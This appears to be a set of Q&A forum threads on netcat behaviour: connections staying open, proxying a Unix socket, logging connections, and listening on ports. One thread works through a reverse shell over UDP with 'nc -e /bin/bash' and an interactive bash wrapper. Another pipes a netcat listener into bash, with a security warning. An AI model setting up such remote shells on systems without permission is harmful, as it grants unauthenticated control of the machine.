When I run this command cat index.html | nc -lnvp 2222 and then open the local address of the server in the browser with this header:
GET / HTTP/1.1
Host: 192.168.146.131:2222
User-Agent: "my user agent here"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
and this as the index.html: hi whats up (thats it)
I get the http request in the terminal where netcat is running and my browser on my other machine is waiting. Only when I CTRL-C the connection on the terminal I get the response in the browser.
My uname -a prints out: Linux kali 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux
When I try to use cat index.html | nc -l 2222 it doesnt work at all. My Kali machine doesnt even get a http request. When I try the same on an Ubuntu machine it works like I want to it to work: It simply sends the index.html to the browser without waiting for me to CTRL-C netcat.
Anyone an idea why netcat behaves so weird?
There are two different netcats, and you're using one of each:
Traditional netcat will avoid closing the connection by default, because the client might send more data.
OpenBSD netcat closes the connection by default when there's no more data to send.
Old versions of HTTP (like you're falling back on) expects the connection to be closed, so it works by default with the OpenBSD netcat.
You can have traditional netcat close the connection on eof as well, using -q 0:
stuff | nc.traditional -l -p 2222 -q 0
man nc writes:
"netcat stays running until the network side closes" so your browser will wait forever for the data to finish. Use -q option to quit, see the man page again: "after EOF on stdin, wait the specified number of seconds and then quit".
cat index.html | nc -lnvp 2222 -q 0
nc -l 2222 does not make sense, you need to use -p to specify the port.
Related
I've tried using netcat in various ways.
The common just exits
echo "Response from server" | nc -l 127.0.0.1 8080
I get the following error in browser net::ERR_CONNECTION_REFUSED
nc -l localhost 8080 < temp.resp
I just simply want to print some text from nectar to browser and maybe later pass some headers along with it too. But right now I am not able to figure out what is going wrong.
I've looked in the man page and tried -w and -I options but none of them are working.
I'm trying to set up a reverse shell between two Linux machines (Kali v. 1.0.9), using the default installation of netcat.
Using the commands below, I was able to make a connection and relay text information between the two machines:
Listener:
nc -luvvp <port>
Client:
nc -uvv <ip> <port>
However, modifying the client's arguments to include executing bash upon a connection:
nc -uvv <ip> <port> -e /bin/bash
And no connection is made, I'm not quite sure how to get this to work, this doesn't seem to be a problem that other people have experienced and was unsure of how to solve the issue. It might also help to know that these commands work fine using the normal TCP mode, it's only after adding the u flag that it stops working for shells. Any help would be appreciated, thanks!
I did some experiments and realized that tunneling shell session via netcat over UDP is almost impossible. The bash does not know that the underlying file descriptor is the UDP socket bash calls read() with buffer size 1. That is fine for interactive shell but when received UDP datagram contains more than 1 byte then data is lost (except the first byte in the datagram).
The netcat uses the standard line buffer at the stdin and the whole line is sent in a single UDP datagram. But bash reads only the first byte from each line.
The other problem is that the client netcat exucuted via command
nc -uvv -e "/bin/bash" <ip> <port>
does not send any data to server because the bash is executed in non-interactive mode and it just waits for a command. The solution is to write a script to execute bash in the interactive mode:
$ cat bashinteractive
#!/bin/bash
/bin/bash -i
and call server
$ nc -luvvp <port>
and client
nc -uvv -e "./bashinteractive" <ip> <port>
But the usage is very inconvenient. It is possible to write command on server when each byte is followed by ENTER
$ ./nc -luvvp 6666
listening on [any] 6666 ...
connect to [10.0.2.15] from xxx.yyy.zzz [10.0.2.16] 37552
$ c
cd
d
/
/
$ l
ls
s
-
-l
l
total 92
drwxr-xr-x 2 root root 4096 Feb 7 15:22 bin
....
drwxr-xr-x 13 root root 4096 Oct 16 2013 var
$ e
ex
xi
it
t
exit
sent 30, rcvd 1422 : Connection refused
So my recommendation is to use other tool than netcat. Perhaps you can try
http://code.google.com/p/udptunnel/
I am trying to expose a unix socket as a tcp socket using this command:
nc -lkv 44444 | nc -Uv /var/run/docker.sock
When I try to access localhost:44444/containers/json from a browser, it doesn't load anything but keeps the connection open (the loading thingy keeps spinning), but the console (because of the -v flag) shows proper http response.
Any ideas on how to get this working?
PS: I know I can use socat, or just tell docker to also listen on a tcp socket, but I am using the project atomic vm image, and it won't let me modify anything except /home.
You are only redirecting incoming data, not outgoing data.
try with:
mkfifo myfifo
nc -lkv 44444 <myfifo | nc -Uv /var/run/docker.sock >myfifo
See http://en.wikipedia.org/wiki/Netcat#Proxying
Edit: in a script you would want to generate the name for the fifo at random, and remove it after opening it:
FIFONAME=`mktemp -u`
mkfifo $FIFONAME
nc -lkv 44444 < $FIFONAME | nc -Uv /var/run/docker.sock > $FIFONAME &
rm $FIFONAME
fg
I am using netcat utility on linux to receive outputs from a program on a windows machine. My problem being that the program on the windows machine does not always give an output.
How can i check that either a connection has been made to netcat ?
What i am doing till now is "nc -l -v 9103 > output" then i check the size of output, the problem this poses is that netcat only write to a file after a certain buffer size has been reached or a new line char is encountered, so some cases evne though a connection has been made the file size is detected as zero.
How can i check if someone has made a connection with netcat.
I tried using
nc -l -v -e someprog.exe 9103 > output
but my netcat doesnt seem to support this
below are the options i have
$ nc -h
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-i secs Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-p port Specify local port for remote connects
-r Randomize remote ports
-s addr Local source address
-T ToS Set IP Type of Service
-C Send CRLF as line-ending
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]
verbose mode will write connectivity to stderr, and you can redirect stderr to a file, the verbose log has something like
connect to [xxx] from [xxxx]
try
nc -l -v -p 9103 -k 1> output 2>connect.log
and monitor connect.log for connectivity
if you don't use -k , netcat quits after 1st connection.
If you can upgrade your copy of netcat: the modern versions (1.10, for one) have an option to execute a program (or a shell command) upon connect. Otherwise, you can make the netcat think it runs in a terminal (to disable buffering of stdout), by using for example script (it just saves everything on stdin/stdout/stderr in the given file). Or use logging features of screen and tmux.
Is there a way to quickly bind to a TCP port/ip address and simply print out all information to STDOUT? I have a simple debugging solution which writes things to 127.0.0.1:4444 and I'd like to be able to simply bind up a port from bash and print everything that comes across. Is there an easy way to do this?
$ nc -k -l 4444 > filename.out
see nc(1)
Just because you asked how to do it in bash, though netcat answer is very valid:
$ exec 3<>/dev/tcp/127.0.0.1/4444
$ cat <&3
That is working as you expecting:
nc -k -l 4444 |bash
and then you
echo "ls" >/dev/tcp/127.0.0.1/4444
then you see the listing performed by bash.
[A Brief Security Warning]
Of course if you leave a thing like this running on your computer, you have a wide open gateway for all kinds of attacks because commands can be sent from any user account on any host in your network. This implements no security (authentication, identification) whatsoever and sends all transmitted commands unencrypted over the network, so it can very easily be abused.
Adding an answer using ncat that #Freedom_Ben alluded to:
ncat -k -l 127.0.0.1 4444
and explanation of options from man ncat:
-k, --keep-open Accept multiple connections in listen mode
-l, --listen Bind and listen for incoming connections